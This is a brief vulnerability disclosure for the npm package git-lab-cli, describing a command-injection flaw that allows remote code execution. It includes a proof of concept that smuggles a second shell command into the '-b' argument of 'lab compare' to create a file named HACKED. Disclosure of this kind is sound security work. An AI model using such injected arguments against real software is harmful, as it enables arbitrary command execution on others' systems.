git-lab-cli

vulnerability remote code execution
severity 3.8
language javascript
registry npm

Description

The git-lab-cli module is vulnerable against RCE since a command is crafted using user inputs not validated and then executedading to arbitrary command injection

POC

  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
npm i git-lab-cli # Install affected module
lab compare -b 't; touch HACKED; #' #  Run the PoC
  1. Recheck the files: now HACKED has been created

References